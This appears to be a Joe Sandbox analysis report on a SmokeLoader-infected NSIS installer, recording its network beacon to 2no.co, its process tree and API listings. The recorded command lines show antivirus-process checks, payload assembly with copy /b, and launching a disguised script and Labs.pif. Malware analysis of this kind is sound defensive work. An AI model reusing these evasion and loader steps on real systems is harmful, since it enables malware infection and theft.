ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 23, 2024 09:20:44.857872963 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:44.857902050 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:44.858236074 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:44.871510983 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:44.871537924 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:45.677864075 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:45.677972078 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:45.744682074 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:45.744709969 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:45.745048046 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:45.745112896 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:45.748821974 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:45.796500921 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:46.311831951 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:46.311909914 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:46.311918020 CEST	443	49703	104.21.79.229	192.168.2.7
Jul 23, 2024 09:20:46.311960936 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:46.318672895 CEST	49703	443	192.168.2.7	104.21.79.229
Jul 23, 2024 09:20:46.318700075 CEST	443	49703	104.21.79.229	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 23, 2024 09:20:44.840737104 CEST	64188	53	192.168.2.7	1.1.1.1
Jul 23, 2024 09:20:44.852020025 CEST	53	64188	1.1.1.1	192.168.2.7
Jul 23, 2024 09:20:46.321042061 CEST	56521	53	192.168.2.7	1.1.1.1
Jul 23, 2024 09:20:46.331325054 CEST	53	56521	1.1.1.1	192.168.2.7
Jul 23, 2024 09:21:12.530373096 CEST	53	50524	162.159.36.2	192.168.2.7
Jul 23, 2024 09:21:13.044060946 CEST	53755	53	192.168.2.7	1.1.1.1
Jul 23, 2024 09:21:13.051623106 CEST	53	53755	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 23, 2024 09:20:44.840737104 CEST	192.168.2.7	1.1.1.1	0x3637	Standard query (0)	2no.co	A (IP address)	IN (0x0001)	false
Jul 23, 2024 09:20:46.321042061 CEST	192.168.2.7	1.1.1.1	0x2b56	Standard query (0)	UaTVQmthThJ.UaTVQmthThJ	A (IP address)	IN (0x0001)	false
Jul 23, 2024 09:21:13.044060946 CEST	192.168.2.7	1.1.1.1	0xd29	Standard query (0)	206.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 23, 2024 09:20:44.852020025 CEST	1.1.1.1	192.168.2.7	0x3637	No error (0)	2no.co		104.21.79.229	A (IP address)	IN (0x0001)	false
Jul 23, 2024 09:20:44.852020025 CEST	1.1.1.1	192.168.2.7	0x3637	No error (0)	2no.co		172.67.149.76	A (IP address)	IN (0x0001)	false
Jul 23, 2024 09:20:46.331325054 CEST	1.1.1.1	192.168.2.7	0x2b56	Name error (3)	UaTVQmthThJ.UaTVQmthThJ	none	none	A (IP address)	IN (0x0001)	false
Jul 23, 2024 09:21:13.051623106 CEST	1.1.1.1	192.168.2.7	0xd29	Name error (3)	206.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

2no.co

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	104.21.79.229	443	7244	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-23 07:20:45 UTC	54	OUT	GET /16G965 HTTP/1.1 User-Agent: Sk Host: 2no.co
2024-07-23 07:20:46 UTC	1128	IN	HTTP/1.1 200 OK Date: Tue, 23 Jul 2024 07:20:46 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close set-cookie: 53800304137263905=3; expires=Wed, 23 Jul 2025 07:20:46 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=8.46.123.33; expires=Wed, 23 Jul 2025 07:20:46 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.4298248291015625 expires: Tue, 23 Jul 2024 07:20:46 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSjAuPguanTJZxPKbNM1UnhZWE4yxgduaqhw86edMlgLMEVCzBiVG5JcN4GYW3LIuFueai5HJHGwWEB1zaMHWai2EaTKMIj%2F5OxwLDyMUDdlp%2BcmWYCuB4Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a79e8e6dda47d14-EWR alt-svc: h3=":443"; ma=86400
2024-07-23 07:20:46 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-07-23 07:20:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:20:38
Start date:	23/07/2024
Path:	C:\Users\user\Desktop\lSmb6nDsrC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lSmb6nDsrC.exe"
Imagebase:	0x400000
File size:	709'936 bytes
MD5 hash:	83741BBCA9631AA4925203FBDDC0AD7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:20:39
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:20:39
Start date:	23/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:20:41
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x800000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:20:41
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x6d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:20:41
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x800000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:20:41
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x6d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:20:42
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 55116385
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:20:42
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "SlutSteLouisTranslation" Cyprus
Imagebase:	0x6d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:20:42
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Breeding + Fuji + Weather 55116385\s
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:20:42
Start date:	23/07/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
Wow64 process (32bit):	true
Commandline:	55116385\Labs.pif 55116385\s
Imagebase:	0x770000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 7%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:20:43
Start date:	23/07/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 127.0.0.1
Imagebase:	0xb70000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:30:58
Start date:	23/07/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
Imagebase:	0x770000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:31:09
Start date:	23/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17%
Total number of Nodes:	1374
Total number of Limit Nodes:	21

Executed Functions

Function 004034FC Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040351F
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
OleInitialize.OLE32(00000000), ref: 0040363A
SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036A7
GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004037FC
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403818
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E

Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E

wsprintfW.USER32 ref: 0040397B
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user~1\AppData\Local\Temp\), ref: 004039AE
DeleteFileW.KERNEL32(0042C800), ref: 004039BA
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004039E8

Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB

CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004039FE

Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B2D
Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B3A

Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00406889
Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895

ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A47
OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
ExitProcess.KERNEL32 ref: 00403A69
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A70
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
ExitProcess.KERNEL32 ref: 00403B13

Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5

Strings

Error launching installer, xrefs: 004038C7
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037D4, 004037D9, 004037EF, 004037FB, 0040380A, 00403817, 00403823, 0040382B, 00403919, 0040399A, 004039C6, 004039E7, 004039F0
TMP, xrefs: 0040382C
TEMP, xrefs: 00403824
SeShutdownPrivilege, xrefs: 00403AA2
~nsu%X.tmp, xrefs: 00403972
Low, xrefs: 00403812
NSIS Error, xrefs: 0040365F
\Temp, xrefs: 004037F6
UXTHEME, xrefs: 004035EA, 004035EF, 004035F5
Genetics Announcements Mess Premier Appliance Structures , xrefs: 00403929
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 004038F1
C:\Users\user\Desktop, xrefs: 0040393C
1033, xrefs: 00403840

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\Desktop$Error launching installer$Genetics Announcements Mess Premier Appliance Structures $Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 2017177436-3924495301
Opcode ID: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
Opcode Fuzzy Hash: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E

Function 004056E5 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405743
GetDlgItem.USER32(?,000003EE), ref: 00405752
GetClientRect.USER32(?,?), ref: 0040578F
GetSystemMetrics.USER32(00000002), ref: 00405796
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
ShowWindow.USER32(?,00000008), ref: 00405832
GetDlgItem.USER32(?,000003EC), ref: 00405853
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
GetDlgItem.USER32(?,000003F8), ref: 00405761

Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3

GetDlgItem.USER32(?,000003EC), ref: 004058A5
CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058BA
ShowWindow.USER32(00000000), ref: 004058DE
ShowWindow.USER32(?,00000008), ref: 004058E3
ShowWindow.USER32(00000008), ref: 0040592D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
CreatePopupMenu.USER32 ref: 00405972
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
GetWindowRect.USER32(?,?), ref: 004059A6
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
OpenClipboard.USER32(00000000), ref: 00405A07
EmptyClipboard.USER32 ref: 00405A0D
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
GlobalLock.KERNEL32(00000000), ref: 00405A23
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
GlobalUnlock.KERNEL32(00000000), ref: 00405A57
SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
CloseClipboard.USER32 ref: 00405A68

Strings

{, xrefs: 0040594B

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
Opcode Fuzzy Hash: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
